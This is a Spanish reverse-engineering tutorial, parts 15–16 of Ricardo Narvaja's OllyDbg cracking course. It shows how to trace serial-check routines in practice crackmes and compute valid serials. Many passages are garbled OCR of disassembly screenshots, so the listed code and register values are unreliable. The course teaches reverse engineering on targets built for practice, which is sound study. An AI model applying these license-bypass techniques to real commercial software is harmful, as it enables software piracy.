= = 286415 (”Thing-o-mat ¡cl Shareware)”) Keys = 6 X 1 


Allí esta paro en WM_LBUTTONUP 


Volvamos al programa con EXECUTE TILL RETURN 


Ú Ó = 10M > 2 

yy Plugins Options 

BP Run 

FF 

> 

¿EC Restart 

Els Close 

18 

; a Step into 

: Step over 

29 Animate into 

30O 

LE Animate over 

3C0 : 

5] Execute till return 

3DE a h, 

368. Execute till user code 
rur rc>l 
POP EBP 


RETN 4 
TEST EAX, EAX 


vn EnNVY EN” 


ou EDI ML¿ HL 

75 15 JNZ SHORT SamBo. B045BEC1 

57 PUSH EDI plisg DS 

ES SABBB200 | CALL SamBo. B047CA3C Trans Eto 

57 PUSH EDI (pres = WM_LBUTTONUP hw = 2E 


ES 90030200 DispatchiMessageA 
EB a? 


C6s6 scooaaal MOU BYTE_PTR DS:[ESI+9C1,1 


Aquí se me abren dos posibilidades poner un BPM ON ACCESS en la primera sección para con f9 ir 
saltando y ver cuando llega a la rutina de comparación del serial, lo cual me parece un poco complejo 
porque aquí ya vi que la rutina del serial es bastante larga y me pasare saltando jeje. 


La otra posibilidad es ver si el serial que tipee ya ingreso en la memoria, como es un serial nuevo pues si 
esta en la memoria, no es porque quedo de antes si no que ya ingreso, así que voy a la ventana M. 


PUN ALS YY ' — 


i Ljejmtiwn]c)/]k/B)R]+]s]- 


Que además de permitirme ver las secciones me permite buscar una cadena en toda la memoria, así que 
hago click derecho SEARCH 


[ErtojRw_ ¡Hw 

tack of Actualize 
Dump in CPU 
Durnp 


Search next y 


Y en la ventana que aparece, en la parte ASCII tipeo mi serial falso. 


Enter binary string to search for  [X] 


ascil [ricnarcito 
UNICODE | 


HEX +04, lá 69 63 6E 61 72 63 69 74 6F 


«y 


3 


[4 Entire block 


[Case sensitive Cancel | 


Apreto OK para que busque en toda la memoria. 


74 6F 48 65 picnarcitoHere.. y, 
99 90 00 Ba TES 
09 00 00 Ba E nta 
09 00 00 00 coroBrto. 8). 
99 Ba 04 an AO AREA 


no > no =ill ilu 


Pues la primera ocurrencia es aquí puedo repetir con CTRL+L y no hallara mas ocurrencias, ni en la 
sección que se abrió ni en el resto de la memoria. 


Dum 3 
as AB 


D 
[E] 
2 
[E] 
B 
7 
[2] 
D 
[2] 
[2] 
ll 
B 
1? 


E a 


Pass E 


Pues pongo un BPM ON ACCESS en mi serial falso pues en algún momento accederá a el para leer, 
Operar o comparar. 


Y apreto F9 


2] > 1]EjmT][wH]c]/]k]B]r). 


REP MOUS DWORD PTR ES: CEDIJ,DWORD PTR DS: [ESI] 
MOU ECX, EAX 


AND ECx,3 
REP MOUS BYTE_PTR ES:[EDIJ,BYTE PTR DS: [ESI] 


PAP FRT 


Para aquí donde lo copiara a su ubicación la que habíamos visto en el ultimo CALL 


EBP 0B12F314 

ESI 0014BF28 ASCII "ricnarcitoHere” 
EDI 66005654 ASCII "Test-o-Doo” 
EIP 7703353D USER32.77D3353D 


ltd | EC (111402 2Dhi+ MEOCCECEEE!r 


Sabemos que el REP MOVS copiara el contenido de ESI a EDI, así que veamos EDI en el DUMP, 
haciendo click derecho en EDI-FOLLOW IN DUMP. 


EBP 0012F314 
ESI 6014BF23 ASCII "ricr 
LEDTAANESA54 ASCII "Test 


Increment Plus 


D USER32. 77D: 
- 3 32bit B(FFF 
Decrement Minus 18 32bit BLFFF 
z S 32bit BLE 
it 
da B 32bit ?FFDE 
Set to 1 e NULL 
; y ERROR_SUCCE 
Modify Enter 13 (NO,B,NE,BE 
Copy selection to clipboard. CtrHC UNORM F7F8 Qt 
UNORH F97C Bt 
Copy all registers to clipboard UNORM 9038 Bt 
UNORH FES4 08 
OBS236464: 
1: 6b009S0ScDO: 
1. 0ODABOBABBDE 
1. 00000000000 
Aiosse RARA ranictare 3 1 


Al llegar con F8 al RET lo habrá copiado entero, y pongo ahora el BPM ON ACCESS en mi serial falso 
aquí 


Breakpoint li Aernor IF, ON Access 


Search for Memory, on write 


RE a 1 Y TI FA 
ECX, DWORD PTR DS: [ESI] 


MOU . 
MOU EBX, DWORD PTR DS: [EDI] 
CMP ECX, EBX 


DEC_EDXx 


Mn EF Mino DTD Nc. TECSTAAT 


EEE 
9B12FS6C ASCII "1556555" 
l/s 151515155 
2 BBODC4394 
SP BO12FB14 

' BB12FB2C 
BODCS654 
BODCS66c 


EIP B0433F65 SamBo 


EST apunta a mi serial falso y EDI apunta al correcto que es 1556555 


Si quitamos todos los BPX 


Comment ; J 
Breakpoint Toggle F2 

Hit trace »|  Conditional Shift+F 
Run trace »'  Conditional log Shift+F 
Go to »| — Memory, on access 

Follow in Dump »| Memory, on write 

View call tree Ctrl+K 


Caarrh far » 


POP ECX 
0O4B1AFF JE SHORT SamBo. 00401841 
??D13BF6| USER32 OUCEAT Car 

Remove 

Disable 

Edit condition 


Follow in Disassembl 


JJ) I'd be proud, ¡fit weren't so easy 


Pues allí esta el cartel de felicitación 


Ahora para intentar pues no hemos visto aun el tema, por lo cual la siguiente lección no estará con 
password, si no para intentar y divertirse, el que quiere intentar el crackme de cruehead hallar un serial 
para su nombre pues puede hacerlo, o sea en user pone su nombre y halla el serial correcto, en la próxima 
parte empezaremos con crackmes USER y SERIAL y el primero que resolveremos será ese, así que a no 
frustrarse si no pueden, que es un tema no visto aun, así que tómenlo como diversión si pueden con el, 
pues felicitaciones, si no pueden, lo aprenden en la próxima parte. 


Hasta la parte 16 
Ricardo Narvaja 
08 de diciembre de 2005 


INTRODUCCIÓN AL CRACKING CON OLLYDBG PARTE 16 


Comenzaremos en esta parte con los crackmes que a diferencia de los hardcoded como hasta ahora, el 
serial es variable y depende del nombre que ingresamos, y es calculado a partir de el. 


El mecanismo para solucionarlos es muy similar, pero veremos algunos ejemplos para que quede claro. 
En la parte anterior los anime a que intenten hallar para su propio nombre, el serial correcto para el 
CRACKME DE CRUEHEAD y bueno, ese será el primero que haremos, así ven como se soluciona y si 


estaban en el buen camino, y si lo solucionaron pues mis mas gratas felicitaciones. 


Abramos el crackme de cruehead en OLLYDBG. 


>] EP a] +] 1JEjm] walel/[xlalrJIs] 50817] 


5 6A 00 
ES FFO40000 GetModu leHandleA 
AS MOU DWORD PTR DS: [4020CA1,EAX 


14L . 6A 00 PUSH B Title = NULL . 
68 F4204000 |PUSH CRACKME. 004020F4 Class = "No need to disasm the codet” 
ES A6040000 FindWindowA 

BECO OR EAX, EAX 


EXE 


MOU DWORD PTR DS: [402064], 49003 
cas Eszodaar HOJ DuoRD PTR DS: [4020683, CRACKME.IndPr 


Allí estamos detenidos en el ENTRY POINT 


Veamos las apis que utiliza para ingresar el texto del serial que tipeamos 


UUTIVICEO?]| . LUIVLO A PIU 
B0403208|. ¡data Import 
B040320C |. idata Import 
66463210 . ¡data Import 
B64B321C|. idata Import 
B0403214|. ¡data Import : 
ARAGAZRI2A!. idata Tmnonrt. KERNFI 22 


e TO LIO LILIA 
.Get 
.«GetDlgltem 


het Madu leHandleA 


Probamos colocando un BP en dicha api a ver si se detiene cuando ingresa el nombre y serial correcto 


| | | 


Command EAECIMIPNICIIE j . 
Program entry point 
Damos RUN 


Register 


Name narvaja 


Serial [98989898 


OK | Cancel | 


Al apretar OK para en la api y en el stack vemos los parámetros 


EXPBQUN A ERI Es 
8BFF MOU EDI,EDI 
55 PUSH_EBP 

3BEC MOU EBP,ESP 

FF7S BC PUSH DWORD PTR SS: CEBP+C] 
FF7S 08 PUSH DWORD _PTR SS: [EBP+8] 
ida 


TEST EAX,EAX 
PUSH DWORD PTR SS: [EBP+14] 


PUSH DWORD PTR SS: [EBP+10] 
PUSH EAX 


CALL to GetD 
hr d = Yu 


OU4B12L9 


DODODOA 


El buffer donde guardara el texto que ingresa esta en 40218E, veamos esa dirección en el dump, hacemos 
click derecho - FOLLOW IN DUMP en la línea del stack que nos informa del buffer. 


Address | Hex_dump__________JASCIL__| 


Allí esta, aun vacío porque no se ejecuto la api, así que hagamos DEBUG- EXECUTE TILL RETURN y 
como estamos en el RET de la api hago F7 para volver al programa. 


tieso [besan 


yO 

y 
50) 
y 


ds 
de 
Dn 


od 
STD 


DO 
00 
DOD-J 
DO 
Dí 
DO 
Dí 
do 
Dl 


EJ 


E 
Di 
Di 
Di 
Di 
De 


Vemos que en el buffer guardo mi nombre a partir del cual realizara operaciones y creara la clave correcta 
para el mismo, si quisiéramos hacer un keygen, deberíamos estudiar a partir de aquí las operaciones que 
realiza el programa para desde un nombre cualquiera, calcular la clave correcta, pero como este no es el 
caso, dejaremos que el programa genere la clave correcta y trataremos de ver si compara con el serial que 
tipeamos damos RUN nuevamente. 


CALL to GetDlaltemTextA from CRACKME. EA 
huind = = DOTE [dE dl ¿class='"8*32770"”) 


[Am 


CRACKME. 00461253 


Para por segunda vez en la api, el nuevo BUFFER para la entrada del serial que tipee es 40217E, así que 
lo busco en el dump. 


66 00 06 46 
Bo 60 60 aa 
72 76 61 6A 61 00|narvaja. 
50 00 00 00 BO DO | .....o.. 
BO 00 00 00 BB DO | ........ 
BB 00 00 00 BBD DO | ........ 


Allí esta justo arriba del otro, ejecuto la api con EXECUTE TILL RETURN y para volver al programa 
desde el RET apreto F7. 


39 38 39 38 39 38 
5/60 06 00 60 060 09 Bn aa 
£E 61 72 76 61 6A 61 60 
,/60 00 BO 66 068 BB Ba Ba 
Bo 66 06 60 66 06 sa Ba 
60 66 060 00 60 06 00 60 


93989398 


narvaja. 


Ba4B2 1%6 .oo...o.s. 
Allí ingreso nuestro serial falso, a partir de este punto el programa comparara el serial falso con el 
correcto que calculo a partir de mi nombre, así que podemos colocar un BPM ON ACCESS en este serial 
falso para ver que hace el programa con el. 


Binary 
Label 


XOR EBX, EBX 
don ESI,DWORD PTR SS: [ESP+4] 


MOU BL,BYTE PTR DS: [ESI] 
TEST BL,BL 


SUB BL,38 
IMUL_EDI,EAX 
ADD EDI,EBX 
INC ESI 


XOR EDI, 1234 
MOU EBX,EDI 


Dalodole 


20 m ammmmmmmis 


Allí esta en BL el valor 39 de mi primer byte, debemos perseguir lo que el programa realiza con el, y en 
lo posible ir anotando para no perdernos si realiza operaciones matemáticas con el mismo. 

MOU_BL+BYTE PTR DS:[ESI] 

TEST BL,BL 


SUB BL,340 
IMUL EDI, ERx 


TEST BL,BL 


SUB BL,306 
IMUL_ EDI, EA%X 
ADD EDI,EBX 
INC ESI 


20R EDI, 1234 
MOU EBX,EDI 


USER3; 


UPF 


Como no es cero no salta y llega a SUB BL,30 


Al restarle 30, queda en BL el valor numérico decimal, del primer carácter de nuestro serial falso que es 


9. 


En la siguiente línea multiplica EDI con EAX. 


90401410] .- 


ERX=BD000BBDA 
EDI=00000000 


Dichos valores estaban inicializados EAX en OA justo al inicio de la rutina y EDI antes de entrar al loop 


se coloco a cero con XOR EDI,EDI 


XOR EBX,EBX 


, E PTR DS: [ESI] 
TEST BL,BL 


DOE 


ADD EDI,EBX 
INC ESI 


a 46 

a ."*EB ED 

a > 81F7 34120001 XOR EDI, 1234 
a . S8BDF MOU EBX, EDI 
a SES RETN 


Di Y] $34 Y] + LJEJMT| 


RD PTR SS: [ESP+4] 


SUB BL,30 NN 
IMUL _EDI,EAX 


1 
C3 

XOR_EAX, EAX 
S0R EBX,EBX 


MOV AL, GA 
MOU_BL,BYTE PTR DS: [ESIJ 
TEST BL,BL 


SUB BL,308 
IMUL_EDI,EAX 
ADD EDI,EBX 
INC ESI 


EB ED 
S1F7 34120001 OR EDI, 1234 
8BDF MOU EBX, EDI 


.. . . +... . . . dro 
% wv 


A 


DO 


e. 


C3 
- FF25 


FF25 SO3140a 
MUA AÑ 


rrar 


vano 


MOU ESI,DWORD PTR SS: [ESP+4] 


lo 


Allí esta de donde surgen ambos valores, al apretar f7 si recordamos la definición de IMUL con dos 
operandos, en dicho caso multiplica ambos considerando el signo, y guarda el resultado en el primer 


operando o sea EDI en este caso. 


Por eso guarda el resultado en EDI el cual queda a cero. 


S0EB 30 SUB BL,3B 

BFAFFS IMUL_EDI,EAX 

BSFB ADD EDI,EBX 
INC ESI 


EB ED 
S1F7 34120001 <0R EDI, 1234 
aan M4 nt 


A 


SlEsI 0040217E ASCII ” 
EDI B000BBB9 
EIP 004013F2 CRACKME 


Do 
nm ( 


Quedando el EDI el valor 9, a no desesperar que esto parece difícil pero ya verán que no lo es en la 
próxima línea INC ESL incrementa ESI para retornar al inicio del LOOP con el JMP y poder leer el 
siguiente byte de mi serial falso. 


33UbB XUR EBX, EBX 
2B7424 04 MOU ESI, DWORD PTR SS: [ESP+4] 
Ba BA MOU AL, GA 

MOU_BL,BYTE PTR DS: [ESI] 
TEST BL,BL 
SUB BL,30 
IMUL_EDI,EAX 


ADD EDI,EBX 
INC ESI 


XOR EDI, 1234 
MOU EBx,EDI 


YUqU13UL 
a E 


Luego de volver a colocar en AL el valor OA, ahora lee el segundo byte de mi serial falso, ahí vemos que 
moverá a BL el valor 38 al igual que antes, testeara si es cero, le restara 30, y llegamos a la IMUL. 


ADD EDI,EBX 
INC ESI 


OR EDI, 1234 
MOU EBX,EDI 


13 EDI, EAX 


EAN OODOOODA 
EDI 00000009 


Vemos que multiplica EDI que tiene el valor que arrastra de la pasada anterior con OA y el resultado lo 
guardara en EDI veamos. 


mu Oo 
¿DO DrnDD) 


31250 mm mmmmmmm 


O sea que va realizando operaciones y va juntando el resultado en EDI, para los que son ya asiduos al 
cracking ya sabrán que hace aquí, lo explicaremos. 


E 
1313 

BB40217F 
DOBBBB6Z 
BO4u13F2 


CRF 
E 


coa 
[rd | 


Si hago doble click en EDI 


D 


BOBBBBDA 


2 BB12FDE4 


YC91EB94 
15s19]5]51=1510) 
BO12FE9S 
BO12FEB4 
B0402136 
BSEG774A 


BO4B13FS 


ES 4B23 
CS 6B1B 


Blex >] +14 $0 9] +) 1Jejm 
5 XOR EAX, EAX 

«OR EDI,EDI 

MOU EST. DUORD PTR 55: [ESP+4] 
MOU AL; 9A 

MOU EL. BATE PTR DS: CESIJ 


ntc 


CRf 


CRf 


32t 
32t 


SUB BL,36 
IMUL_EDI,EAX 
ADD EDI,EBX 


MOU EBX, EDI 


Hexadecimal 


Signed 


Unsigned [9ese9e9e 
coca | 


El valor de EDI es un valor hexadecimal, en la segunda línea veo su valor decimal, que corresponde a mi 
serial falso o sea lo que ha hecho con todo este loop (que es un loop bien conocido para los asiduos al 
cracking jeje ya lo ven y saben que a la salida estará el valor HEXA del serial falso. 


O sea en resumidas cuentas si tipee 


98989898 lo primero transformo esto en el número decimal 98989898 y luego lo transformo a hexa 
quedando 5E6774A. 


z da Ñ INC ESI 


SiF7 3412000 XOR EDI, 1234 
BD MOU EBX, EDI 


DIO 


Y 


4 

4 
bb04b1 
064013FD 
00401 

401 


DOBBBBBA 
ECxX BB12FDE4 
EDX 7C91EB94 n 
EBXx 000090045 
ESP BB12FE93 
EBP BB12FEB4 
ESI 60402136 € 
BSEG6S7TE 


EIP 604013FB C 


na ra anana 


DOBBBBBA 
ECX BO12FDE4 
EDx 7C91EB94 ntdl 
EBX BSEG6657E 
ESP BO12FE9S 
EBP BO12FEB4 
ESI 00462186 CRAL 
EDI MS5EG657E 


EIP 604613FD CRAC 
Fa FS 042 27hi 


Vemos que al volver del ret llega a la comparación EAX con EBX, lleguemos allí, ese era el salto que 
decidía si era correcto o no así que estamos bien, 


Er LL + ps > 1] EM T]W) 
4 


POP UN 
CMP_EAX, EBX 


Y 


E 
EB 9A 

Es FCo00BBa 

sn EB 93 

Ca 600000a ENTER 0,5 
3 PUSH EBX 


€ 


PILIISH EST 


8304 M4 ADD ESP, 4 


53 POP EAX 

3BC3 CMP_EAX, EBX 
w 74 07 

13010000 

e 9A 
FCoouuBa 

lllslalal] 
53 


8170.00 11814 CHP_DUORO PTR SS: LEBPICI 111 
837D 6c 18 |CMP DWORD PTR SS: LEBP+C1,10 
0FS4 S10000al 

8170_0C 61621 CHP_DUORO_PTR SS: [EBP+01, 201 
BS BODBBBBA |MOU EAX,O 

E POP EDI 

SE [POP EsI 


EBX=55E6657E 


EAX=0000547B 


Al llegar vemos que compara el valor que calculó que esta en EBX con EAX que vale 547B 


Como EAX es un valor determinado del programa y EBX es calculado a partir de mi serial falso el cual 
es incorrecto obviamente, aquí no hay igualdad. 


Si EBX fuera igual a EAX el programa saltaría a CORRECTO, por lo tanto debemos analizar como llegar 
a que allí haya una igualdad. 


Veamos nuestras anotaciones 

EBX= (Valor hexadecimal del serial falso) XOR 1234 

Como yo quiero que EBX sea igual que EAX, en dicho caso se verificara la igualdad y estaremos en el 
caso correcto 

Si EAX=EBX 

Reemplazo EBX por EAX ya que son iguales 

EA X=(Valor hexadecimal del serial correcto) XOR 1234 

Y ya no es más serial falso porque el serial que hace que EBX y EAX sean iguales es el serial correcto. 
Despejo 

EAX XOR 1234= (Valor hexadecimal del serial correcto) 

Y EAX es un dato pues lo tengo de la comparación EAX=547B 

547B XOR 1234 = (Valor hexadecimal del serial correcto) 


Si soluciono el XOR 


464F = (Valor hexadecimal del serial correcto) 


Si 464F es el valor correcto hexadecimal, si lo paso a decimal tendré mi serial para tipear 


E Calculadora 
Edición Yer Ayuda 


] 464F 
QHe ODee ODat  OBin (O Qwod ODwod Owod  ÓByte 


mom PP 
00 9 DODDt 


O O O O O O 


Apreto decimal 
Calculadora 


Edición Wer Ayuda 
[ 17999, | 


OHez (Dec ODct  OBin () Sexagesimal O) Radián O) Centesimal 


Ch o [Of 


Ese es el serial correcto para narvaja quitemos todos los BPM y BPs 


Register 


Name hnarvajal 


Serial ñ 7999 


OK | Cancel | 


Apreto OK 


Good work! 


Great work, mate! 
Now try the next CrackMe! 


Y obtuve el serial para mi nombre 


Esta es una forma de solucionarlo, otra forma de pensarlo que se llega a la misma soluciones es esta 
Si a mi serial falso le hace operaciones y lo transforma a esas operaciones las llamamos función F 
F (serial falso) =EBX 


O sea que a mi serial falso le realiza ciertas operaciones llamadas F y lo convierte en EBX el cual 
comparará. 


El otro miembro de la comparación que es EAX sigue el mismo parámetro 


F (serial verdadero)=EAX 
Aplicando las mismas operaciones al serial verdadero en este caso llego al valor de EAX, por lo tanto si 
tengo EAX ya que es un dato de la comparación y tengo las operaciones realizadas. 


Para hallar el serial verdadero deberé a EAX realizarle las operaciones opuestas para hallar el serial 
verdadero. 


Serial verdadero= (funciones opuestas de F ) EAX 


O sea si fuera que a mi serial falso se le sumo un valor para llegar a la comparación, este se lo deberé 
restar a EAX y así siempre debo realizarle las mismas operaciones pero opuestas. 


En este caso la operación opuesta de XOR es la misma XOR ya que es una operación inversible 
Por lo cual 


XOR EAX será realizar la función opuesta de F y me dará el valor hexa de mi serial correcto, a partir del 
cual, pasándolo a decimal obtendré el serial verdadero. 


Esto que parece mucho palabrerío no lo es tanto, de ambas formas despejando o realizando las 
operaciones opuestas normalmente se puede llegar al serial correcto, salvo que se use una operación que 
no tiene opuesta, ya Veremos esos casos. 


Veamos otro caso el del ya visto SPLISH pero en el modo USER-NAME ya que la parte HARDCODED 
ya la hemos hecho. 


Arrancamos el SPLISH en OLLYDBG y estamos en el ENTRY POINT 


SH EAX Binary » 
SH DWORD PTR 
Assemble Space 
U DIJORD PTR 
SH 1 Label : SM_CYSCREEN 
E ES y 
Cornment Ñ 
Breakpoint » 
Hit trace » 


Run trace » 


Go to » chain 
Follow in Durnp » 16058 
Wiew call tree CtrHK 


Search for Name (l: y current module Ctrl+I 
Find references to Name in all modules 


Veamos las apis que utiliza 


2. GetModu leHandleA 
GetSystenMetrics 


B0402018| .rdata Import 
B0402034| .rdata Import 
B040206C| .rdata Import 
B0402024 .rdata Import 
66402020) .rdata Import 
B0402038| .rdata Import 
pagaz028| «rdata | Import 


-.LoadBitmap 
LoadCursorA 
LoadIconA 


La conocida GetWindowTextA pongamos un BPX en dicha api 


Command BP GetWindowTextA y] 
Program entry point 


Y demos RUN con F9 


Splish, Splash 
File Help 
Hard Coded: 


Check Hardcoded 


Inarvaja. 


Serial: [989898 
NamefSerial Check 


Alli tipeamos el nombre y serial falso y apretamos el boton NAME/SERIAL CHECK 


a) A je jmriwja 


PUSH BL 
PUSH USERS2. 7703210 


MOU EDI,DWORD PTR SS: [EBP+C] 
X0OR EBX,EBX 
CMP EDI,EBX 


6A BC 

63 AB2Z1O37? 
ES_73864FEFF 
38B7D ac 


Para en la api veamos el BUFFER 


DIA EMPLY Y 
STS empty 1 
rom TYTN 

06 


="Edit”, parent=00410624) 


OO4D1ISFEJPCALL to Ge 


0020063 hind = 2 


1487 from Splish.004015E4 


STS empr 
CALL to GetllindowTextA from Splish.004015F1 
hlind = 6B2DB63E (class="Edit” parent=00410624) 
42: Buffer —anliabaaIaRdAa > "TT E 
EGunt =| Address » 


4 
ee PETURN Y how ASCII dump 


al Show UNICODE dump 
RETURN tá 
ch Splish.0% Lock stack 
3 optisn.oí Copy to clipboard Ctrc 
60 Modify 
78 Splish.0é Edit Ctrl+E 
RETURN tá Push DWORD 


Splish. BÉ 
24 Splish.0 Pop DWORD 


Search for address 
Search for binary string Ctrl+B 


Go to ESP E 
Go to EBP 
28 eerury eo Go to expression ctrG 


Allí está vacío aun, hagamos EXECUTE TILL RETURN para llegar al RET y luego F7 para volver al 
programa. 


BO 00 00 00 60 00 BO B| ....oo.. 


Vemos que en este caso ingreso primero el serial falso, así que marcamos el mismo y ponemos un BPM 
ON ACCESS. 


AALORIROA.... 
Backup 


Copy » 
Binary E 3 
Label 


, DM Acce: 


Casrrh far » 


Mirna sarita 


E 2] > 1jEjmTIwH] 


BC 
PUSH USERS2. 7703210 


mou EON* Elo PTR SS: [EBP+C] 
XOR E 


Para de nuevo en la api para ingresar el nombre, como esto por ahora no nos interesa damos RUN 
nuevamente. 


EROUEK "Et, BYTE PTR DS: [ESI+EBX] 


CD 
IDIUV ECX 
es Ene PTR DS: [EDI+EBX1, DL 


CHE Spas PTR_DS: [403467] 


664 
SED 
S6E 

l 


a 
B 
a 
B 
a 


Para en esta rutina 


La primera línea mueve nuestro primer byte del serial falso si ejecutamos 


+BP-OLLY by RedH... [X] 


Ln 
Lish. 004 


DAA 


JD 


IND 


number.” 


Luego tenemos la siguiente instrucción CDQ, ya que no la explicamos veamos que dice nuestro amigo 
GOOGLE, el puede ayudar tipeamos en el buscador de GOOGLE CDQ ENSAMBLADOR. 


En este caso igual no es necesario ya que EDX es cero y esta preparado para obtener el resto de la 
división pero como es un loop por si acaso siempre mejor antes de una IDIV usar el comando CDQ para 
preparar los registros EDX y EAX para la misma. 


Pues dividirá EDX:EAX por ECX y el resultado va a EAX y el resto a EDX bueno este es todo el truco 
vemos que el byte nuestro vale 39 y lo dividirá por ECX que es OA 


Registers (FPU) 
ERX BBBBa 
ECX BABABBBA 
EDX 000000B0a 
EBX 0000BBBa 
ESP 0B12FC74 
EBP 0B12FC74 
ESI 60443242 ASC 
EDI 60640324D Spl 


EIP 0040166E Spl 


CO ES MB23 32E 
Pi Fanta 22 


Veamos que ocurre 


Registers (FPU) 
EAX BOBBBBaS 
ECX BBBBBABA 
EDX 00BMBBa? 
EBX 00B00BABa 
ESP BB12FC74 
EBP 0M12FC74 
ESI 00403242 ASCI 
EDI 60443240 Spli 


EIP 00401678 Spli 


Allí esta el resultado de la división esta en EAX y es 5 y el resto esta en EDX y es 7 


10324051 LEA EDI,OWORD PTR DOS: [463240] 
ala MOU ECX, BA 
E EAX,BYTE PTR DS: [ESI+EBX] 


CD 

) [| IDIV_ECX 

141F ¡MOU BYTE PTR DS: [EDI+EBx], DL 
INC EBX 

3610 67344001] CMP EBX, DWORD PTR DS: [403467] 


PUSH O 


Vemos que en la próxima línea guarda el resto de la división en 40324D veámoslo en el DUMP 


Allí lo guardara ejecuto con f7 


88141F 

 3B1D 6734400 
5 ED 

.v FRA 2A 


MOU BYTE PTR DS: LEDI+EBXJ],DL 
INC EB 


MN X 
chP SA0BT. Sel PTR_DS: [403467] 


Vemos que EBX que era cero es incrementado y comparado con 6 para salir del loop por ahora no son 
iguales por lo tanto repite. 


. P07 LEM CUA WORD PIN UD LAOS 
. 3 [MOV ECX,6A 
> NR EAX,BYTE PTR DS: [ESI+EBX] 


DQ 
IDIV ECX 
MOU BYTE PTR DS: [EDI+EBxJ, DL 


INC EBX 
CMP EBX, DWORD PTR DS: [403467] 


PUSH O 
PUSH Splish. 00403004 


DOES 


a] 
—1ñ 


Jump from B04B167A 


Ardres= | Hex rdiumn 


Allí va leer el segundo byte 


2 BBBBODOS 
000995 
lala l=]51%] 


240 Spl 
1670 


ESI 
EDI 6040 
EIP 0040 


DOGO 
Dm 


¿D1Y ocu 
IR BYTE PTR DS: [EDI+EBX1,DL 
CMP EBX, DWORD PTR DS: [403467] 


PUSH O 
PUSH Splish.0040309A 
PUSH Splish. 00403040 
PUSH B 


SMOD A 


PUSH O 
PUSH Splish.0040309A 
PUSH Splish.004030B5 
PUSH B 


aaa 


LEA ESI,DWORD PTR DS: [493240] 


or 06 66 66 4b 
,/60 66 Ba 02 as 

BS 63 66 00 Ba 
,/60 00 60 60 09 Ba 

Bo 66 060 60 66 06 Ba 
5/00 06 00 60 09 00 Bn 


Pos 


Y 


PA... 


por 
Da 
h 


1NL EBX 
a [ere EBX,DWORD PTR DS: [403467] 


PUSH B Style = MB_OK!MB_APPLMODAL 
PUSH Splish. 00403099 Title = lish, Splash” 
PUSH Splish. 00403040 Text = "Please enter your name.” 
PUSH a hOwner = NULL 
MessageBoxA 


PUSH O Style = MB_OKi¡MB_APPLMODAL 
PUSH Splish. 00403094 Title = 
PUSH Splish. 00403088 Text = "Ple 

PUSH B 


is 
ase enter your serial number.” 
hOwnex = NULL 
MessageBoxA 


LEA ESI,DWORD PTR DS:L403240] 
001 LEA EDI,DWORD PTR DS: [483258] 


Llegamos allí y vemos los mensajes de correcto o incorrecto por lo cual ya sabemos que estamos cerca. 


MessageBoxA 


(LEA ESI. PTR DS:140324D] 

Ol LEA EDI¿DWORD PTR DS: [493258] 
XOR_EBX, EBX 

CMP_EBX, DWORD PTR_DS: [403463] 


MOUSX EAX,BYTE PTR DS: CEDI+EBx] 
MOUSX ECX,BYTE PTR DS: [ESI+EBX] 


cap SADAToS 


INC EBXx 


PUSH A 
PUSH Spl ish. 00403009 
PUSH Splish. 00403042 
PUSH a 


PUSH A ¡MB_APPLMODAL 
PUSH Spl ish. 00403009 lash” 
PUSH Splish.D0403067 
PUSH a 


again.” 


y 
>» = NULL 
MessageBoxA 
LEAVE 


AS 


EIP BO4016B 
FS An; 


ESTI apunta a donde guardo los restos y EDI apunta a algo interesante jeje? 


8030 S832400 LEA EDI. DUORO PTR DS: 1403258] 
S21D_ 6334400 FCH. E8%,DlORD PTR_DS: [493463] 
OFBED41F HOUSX EAX,BYTE PTR DS: CEDI+EBX] 
OFBEBCIE HOUSX _ECX,BYTE PTR DS: CESI+EBX] 
CMP EAX,ECX 


INC EBX 
MP SHORT SpLish. 00491686 


(1) PUSH O 
BA304000 [PUSH Spl ish. 0040300 
42304000 Bl A 


A Da 
A 
A Ya PUSH A 
BA304000 [PUSH Spl ish. 00403004 
67304000 [PUSH Spl ish. 00403067 
A Da PUSH O 
53000000 
. C2 0800 


cc 
$- FF25 7020400 


DS: [60403463 108000907 
EBx=00000099 


Jump from B04016CB 


Vemos que EBX vale cero y lo compara con 7 y si es igual 


1UU4U15HE 
004016B4 


DB 
0B4B16E0 


.  SUSU 53244 
+. 33DB 
> 3B1D 63344001 


42304000 
Da 
63000090 
13 


LEH EUL, UWURO PIR Us: 14432 
XOR_EBX,EBX 
cap ono PTR_DS: [403463] 


74 0F 

DFBED41F MOUS2 EAX,BYTE PTR DS: [EDI+EBX] 
DFBEOC1E MOUSX ECX,BYTE PTR DS: [ESI+EBX] 
5 cap ODA 

43 INC EBX 

EB E9 JMP SHORT Splish.004016B6 

+69 0B PUSH U 

68 BA304008 |PUSH Splish. 00403004 


PUSH Splish. 00403042 
PUSH O 


lo 


MB_OK:MB_APPLMODAL 
"Splish, Splash” 

"Good job, now keygen it.” 
HOMER = NULL 

MessageBoxA 


Saltaría al cartel correcto lo que pasa que hay un loop y en el medio otro JNZ de las comparaciones que si 
una sola falla nos llevara antes al cartel de incorrecto. 


DD ALICHONO 
8D20 5832400 

-« 33DB 

> 3B1D_63344001 

.v 74 0F 
OFBEO41F 


LEA COLA UWUNL NIN UDI LAOS 
LEA EDI,DWORD PTR DS: [403258] 
XOR_EBX, EBX 

CMP_EBX,DWORD PTR DS: [403463] 


MOUSX EAX,BYTE PTR DS: CEDI+EBX] 


OFBESCIE noes ECXLBYTE PTR DS1 LESI+EBXJ 
. 3801 CMP EAX 
eosa1eco «vrs 1 ÓNZ SHORT SpLish.094916E2 
5 . 143 INC EBX 
E9 MP SHORT Splish. 00401686 
A Ba PUSH 
oA3o4000 [PUSH Splish.D0403004 
42304000 


A aa 
63009000 
13 

[1] 

BA304000 

67304000 

A aa 
53000009 

aASaAR 


PUSH Splish.00403042 
PUSH a 


PUSH 8 
PUSH Splish. 00403004 
PUSH Splish.B0403067 
PUSH 8 

CALL_<UMP. £USER32. MessageBoxA> 
LEAUE 

RETN 2 


-pa*00 00 


00 00 60 Ba 
os 08 0a aa 


Na Caña Caña Caña 


"Splish, Splas 
Good job, now keygen it.” 
ULL 


Style MB_OK:MB_ 8Pr MODAL. 
[is = 


MessageBoxA 


"Splish, Splasi 


Style = MB_OKiMB_| ERPELHODAL 
= "Sorry, please try again.” 
hOwner = NULL 


MessageBoxA 


A EAX moverá el primer byte que apunta EDI que es 02 y a ECX mueve el primer byte de mis restos o 
sea 7. 


Dí 
A y 


DD 


3 00 CO 


oma JO 
DOWN" 


MOUSX EAX,BYTE PTR DS: CEDI+EBX] 
MOUSX ECX,BYTE PTR DS: [ESI+EBX] 


cap OR ECX 


INC EBXx 
PUSH B 


